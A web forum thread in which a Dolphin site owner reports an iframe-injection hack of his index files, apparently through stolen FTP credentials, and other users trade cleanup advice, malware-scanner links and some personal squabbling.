Hi - strange thing happened just now. I went to log into the admin panel for my beta test site and it didn't work - screen just kept refreshing. Then I went to look at the site itself in another browser (chrome) and my virus protection system alarms went off saying malware had been found - specifically a trojan horse. The error message said it was "HTML:Illiframe-B [tri]" whatever that means. I assume this site has been hacked. Any idea how they did it? (or for that matter why? - there is nothing in there) Any way to get rid of it?
Thanks
Rob
|
They do say that when this sort of thing happens, sometimes a compromised FTP access or whatever, then check you PC for Trojans and malware.
If you havent got a malware checker or remover, then a good free one is
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html
and go from there
Regards
tyke
|
This was some days earlier rapported also.
Its seems that al the index files were comprimized.
So check your testsite for a Illiframe code in the index files. Kids first |
|
no worries your not alone :)
http://www.boonex.com/unity/forums/?action=goto&topic_id=Dolphin-or-Server-Hacked-
scan your computer first...your are lucky if only the test site got infected my whole server all index files got f........ed
|
The list of ways could be long & distinguished of how they did it.
Anonymous FTP enable
Backdooring through triple 6/7 permis...
Weak password w/simple to determine ftp/cpanel
Set passwords for cpanel/ftp using a password generator, do not try to create them yourself (most cPanel/MySQL DB Systems come with one).
In the end, if they were in and got the index.html/php files, then guess what? A good hacker has found your db login/password and already stolen what they really wanted.
My sites avoid this by utilizing BruteForce, Mod_Security & Mod_Sentry to deal with issues that hackers might try. While this will stop most, nothing is foolproof. In addition, a good host utilizing a VPS or Dedicated (prefer Dedicated) servers is one of the most cost effective ways to control hacking.
If your on a shared server, then they don't need much to drop in new index files into the system as a good hacker will know to just skim from account to account and drop them where they want them. For those who argue they can't afford the cost of the VPS/Dedicated Servers, how much is your time worth when you have to go back and fix all of this?
Last note: Wipe your personal system clean before you go near any more servers.
|
@mydatery I'm not on a shared server, still I was hacked. I think this hack is more about compromised ftp passwords than server type. |
ive been reading up on this new attack wave, apparently it isnt software related either cases have been reported on PHPbb, SMF, IPB and so on, so its not dolphin related.
you can check if your site is infected somehow by using this
http://www.unmaskparasites.com/
regards
tyke
|
|
Hey guys - thanks for jumping in on this. Looks like it might be my fault- I had a weak username - a hyphenated domain and I used half of it as a username. Not sure how they got the password though. In meetings tomorrow so won't have time to fix right away. See message below from my host http://alterhosting.com. This is failure number 6 on the betas. Synergy - your information about compromised Filezilla is especially disturbing - need to check into that as soon as I get some time.
Thanks for your help everyone
Rob
------------
Hi Rob,
All index.php and home.php files have been replaced with the hackers
files.
/httpdocs/index.php
/httpdocs/administration/index.php
/httpdocs/flash/index.php
/httpdocs/flash/modules/board/skins/index.php
/httpdocs/flash/modules/chat/skins/index.php
/httpdocs/flash/modules/desktop/skins/index.php
/httpdocs/flash/modules/im/skins/index.php
/httpdocs/flash/modules/mp3/files/index.php
/httpdocs/flash/modules/mp3/skins/index.php
/httpdocs/flash/modules/photo/skins/index.php
/httpdocs/flash/modules/video/files/index.php
/httpdocs/flash/modules/video/skins/index.php
/httpdocs/flash/modules/video_comments/skins/index.php
/httpdocs/flash/modules/video_comments/files/index.php
/httpdocs/modules/index.php
/httpdocs/modules/boonex/ads/index.php
/httpdocs/modules/boonex/articles/index.php
and all folders under /httpdocs/modules/boonex/
You will need to remove all files from /httpdocs and install Dolphin anew.
I changed your FTP settings for mysite-mysite.com to the following:
username: xxxxx
password: xxxxx
|
@mydatery I'm not on a shared server, still I was hacked. I think this hack is more about compromised ftp passwords than server type.
Synergy, note that I listed weak password/username as a potential risk. Simply highlighted in addition the risk that is assumed when one runs on a shared server in addition to other things. To help you out here is the post again.
The list of ways could be long & distinguished of how they did it.
Anonymous FTP enable
Backdooring through triple 6/7 permis...
Weak password w/simple to determine ftp/cpanel
Set passwords for cpanel/ftp using a password generator, do not try to create them yourself (most cPanel/MySQL DB Systems come with one).
In the end, if they were in and got the index.html/php files, then guess what? A good hacker has found your db login/password and already stolen what they really wanted.
My sites avoid this by utilizing BruteForce, Mod_Security & Mod_Sentry to deal with issues that hackers might try. While this will stop most, nothing is foolproof. In addition, a good host utilizing a VPS or Dedicated (prefer Dedicated) servers is one of the most cost effective ways to control hacking.
If your on a shared server, then they don't need much to drop in new index files into the system as a good hacker will know to just skim from account to account and drop them where they want them. For those who argue they can't afford the cost of the VPS/Dedicated Servers, how much is your time worth when you have to go back and fix all of this?
Last note: Wipe your personal system clean before you go near any more servers.
Remember, our goal here is to create a history to help educate today and tomorrow, not just the current poster.
|
@mydatery No, our goal is to solve the matter at hand, if not the current poster who else, this post is the reason we're answering in this thread.
This has nothing to do with weak password/username, our server ftp password have been compromised, it doesn't matter how strong or weak the password/username are.
|
The only one who knows this password was me and Boonex - I sent it to them recently, but maybe someone hijacked enroute. Still not clear on how this happened but will investigate tomorrow evening.
Rob
|
The only one who knows this password was me and Boonex - I sent it to them recently, but maybe someone hijacked enroute. Still not clear on how this happened but will investigate tomorrow evening.
Rob
If this is that Gumblar.cn exploit then its not so much that you have sent your loggin details to somebody else and they have been intercepted enroute, its the fact that you or the person who has your loggin details are infected with this malware trojon, and it is really very important to give your system the once over.
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html
That one is free and highly rated. (i shifted 18 from my system with that)
regards
Tyke
|
Yes, Tyke is correct about what needs to be done, you should follow these steps to clean your PC: 8-step Viruses/Spyware/Malware Preliminary Removal Instructions http://www.techspot.com/vb/topic58138.html |
@mydatery No, our goal is to solve the matter at hand, if not the current poster who else, this post is the reason we're answering in this thread.
This has nothing to do with weak password/username, our server ftp password have been compromised, it doesn't matter how strong or weak the password/username are.
Actually Synergy it had to do with an FTP Client being infected it now appears. Oops, guess you didn't catch that part.
Now, moving on. The purpose of utilizing a forum and not a chatroom/blog is to create a historical/searchable reference that others can visit and utilize in the future to solve similiar problems when they discover them. Hence the reason we are here, to provide support/assistance to the current poster (today) and the future posters (future) so that others might not have to wait forever to get answers to the same questions.
If we were only here for the original poster (caltrade in this instance) then this thread would be destroyed once he has obtained the answers he needs and resolved the issue at hand.
As far as your link that your posting everywhere goes, it's nothing more than forum spam as the steps you give out do NOTHING to actually clean the pc system that your having them do it on. If it did you would not be making statements like this in the opening post of that forum:
PLEASE DO NOT USE THIS GUIDE AS A ONE-STOP-FIX-ALL.
It only serves to help you produce some logs for us so we can see if your system needs further attention and cleaning.
Please also ensure you complete ALL steps in this thread, BEFORE you post the requested log files.
DO NOT SKIP ANY OF THE INSTRUCTIONS
If you have any problems following any of the instructions, please ask for assistance.
Why would I want to create logs for you to look at? Hmmm, especially if it just means they go to you so you can tell me what I need to buy to clean my system.
I'll stick to the way I do things thank you to protect my computers/servers and so on. Learned long ago, if a site is trustable to download from then it's all over the place. The fact that I would have to download something from your site to check my system and your site your listing is not well known, screams high risk/don't even think about clicking that download button you have in the early steps.
|
@mydatery If you look at the top you will see I posed:
"Hi Rob, as you know my site was also hacked, take a look at this: http://www.google.com/support/forum/p/Webmasters/thread?tid=0cdb473d121b6895&hl=en"
Which mean I know how it originated, I commented on the end results, didn't think I had to write a book as you often do. I'm not going to debate this with you, knock yourself out, we all know this is your forte, so babble on alone.
|
@mydatery If you look at the top you will see I posed:
"Hi Rob, as you know my site was also hacked, take a look at this: http://www.google.com/support/forum/p/Webmasters/thread?tid=0cdb473d121b6895&hl=en"
Which mean I know how it originated, I commented on the end results, didn't think I had to write a book as you often do. I'm not going to debate this with you, knock yourself out, we all know this is your forte, so babble on alone.
What in the world are you babbling about? Great... You knew what was up with this and instead you've decided to spam the forums here (which you rarely participate in) with news of something you knew about on 7/11/2009 ( I can read dates in forums, my teacher will be so proud) and failed to share with anyone. Instead, you took it to the google forums and not to the place where people have far more work in their sites than the average google adsense person has.
Wow! Not bad, you managed to keep the secret for 2 months.
Again, I stand by the statement that these forums are here to help people today and people tomorrow. If one believes it is only for today then one has a very closed perspective on how forums work.
|
Oh, about the guide its a stating point to get rid of the Viruses/Spyware/Malware. Each person can decide for themselves how far they want to go with it. |
I'm really through with you. I see you don't comprehend well, I'm sorry, carry on.
@mydatery If you look at the top you will see I posed:
"Hi Rob, as you know my site was also hacked, take a look at this: http://www.google.com/support/forum/p/Webmasters/thread?tid=0cdb473d121b6895&hl=en"
Which mean I know how it originated, I commented on the end results, didn't think I had to write a book as you often do. I'm not going to debate this with you, knock yourself out, we all know this is your forte, so babble on alone.
What in the world are you babbling about? Great... You knew what was up with this and instead you've decided to spam the forums here (which you rarely participate in) with news of something you knew about on 7/11/2009 ( I can read dates in forums, my teacher will be so proud) and failed to share with anyone. Instead, you took it to the google forums and not to the place where people have far more work in their sites than the average google adsense person has.
Wow! Not bad, you managed to keep the secret for 2 months.
Again, I stand by the statement that these forums are here to help people today and people tomorrow. If one believes it is only for today then one has a very closed perspective on how forums work.
|
Mydatery, Synergy helps people frequently here - often by private message, and her message is anything but spam - please don't take cheap shots. I have found both of your posts useful, and I can see that Lyubovl has made a blog post on this. I did a scan of my computer last night and it didn't find anything but will use the other tools people have recommended later today. Thanks for your help everyone.
p.s.
It is files on my site that are infected, not the database - right? In other words, if I do a "restore" to an uninfected system it should be fine - right?
|
Rob, it's only the files, I was told to restore from backup, so it should be fine provided the Viruses/Spyware/Malware is off your personal system. |
@mydatery,
i suppose your teacher wouldnt be so proud that you missed this post April 20, 2009, 3 months before synergy is accused of keeping a secret. Boonex Ignored it as well as many others who didnt have time to bother with it. <iframe> hack via ftp compromise has been going on not only on boonex sites but many others as discussed on this forum and many others.
so its now been 5 months since the first report of this, it came and went with a total of five posts.
http://www.boonex.com/unity/forums/topic/Dolphin-or-Server-Hacked-.htm
i remember this post, but also know that required authentication of login accounts helps out with this as well. but thats another story for another day.
fact of the matter is that this is not a defect in dolphin, but a defect in your ftp client and browser. this has been directly related to IE for one, and password storage on unsecured ftp connections.
Regards,
DosDawg
When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support |
@Tyke
You recommended this?
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html
With all due respect, I hated it. It didn't do squat but wanted payments to remove some adware - it was also trying to sell me a registry cleaner. Advertising all over the place, I had to remove it from my system.
Rpb
|
@Tyke
You recommended this?
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html
With all due respect, I hated it. It didn't do squat but wanted payments to remove some adware - it was also trying to sell me a registry cleaner. Advertising all over the place, I had to remove it from my system.
Rpb
Oh ok, well im sorry about that, non the less this software is highly recommended, so here is the direct link where i got this from myself.
http://www.malwarebytes.org/
to repeat,
Its free
No advertisements or pestering to buy some add remove module
Free updates to the latest threats database,
Scan any and all drives.
What you have experienced must be something to do with that Cnet place, as its nothing like you described from this direct link, as i use this programme daily.
Anyhow, sorry again.
Regards
Tyke
|
Thank you Tyke - that link is much better. Someone must have packaged it with another program at that other link. I just ran it and it did seem good, however it didn't find anything so I don't know if it would have told me I have to pay them if it had found something.
Rob
|
Thank you Tyke - that link is much better. Someone must have packaged it with another program at that other link. I just ran it and it did seem good, however it didn't find anything so I don't know if it would have told me I have to pay them if it had found something.
Rob
I use it myself. If it's the correct free version direct from malwarebytes.org, then it's completely free. And it is quite good. It's able to remove things that many of the other common free programs like ad aware and spybot cannot remove.
Its database of what it detects is not as large are the others, but it does a superior job at removing what it does find.
It's also the same software I recommend when this hack was brought up 5 months ago as DosDawg pointed out.
https://www.deanbassett.com |
Thanks guys. I scanned using several of the techniques mentioned here - I had some adware but there was no malware on this computer. Someone on the blog is spreading the misinformation that this, "doesn't have anything to with sharing passwords with other people". That is completely wrong - it has everything to do with sharing your passwords with other people. If they have the virus and access your account via an unsecure FTP then your site can be compromised. Bigal has a good suggestion there that when you need to share your site access you create a temporary account for this purpose.
Rob
|
hmmm I found with this malware scanner a backdoor in the file desktop 3.5.0 Its now removed. But you see sometime other programms find more then other. :) Kids first |
